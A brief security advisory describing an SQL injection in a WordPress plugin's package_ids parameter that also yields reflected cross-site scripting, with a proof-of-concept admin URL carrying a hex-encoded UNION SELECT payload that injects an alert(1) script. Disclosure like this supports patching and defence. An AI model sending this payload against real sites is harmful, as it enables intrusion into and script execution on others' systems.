The plugin does not sanitise and escape the package_ids parameter before using it in a SQL statement, leading to a SQL injection, which can also be exploited to cause a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/admin.php?page=wpdm-stats&package_ids%5B0%5D=0%29+UNION+SELECT+1%2C0x3c2f6f7074696f6e3e3c2f73656c6563743e3c696d6720737263206f6e6572726f723d616c6572742831293e+--+p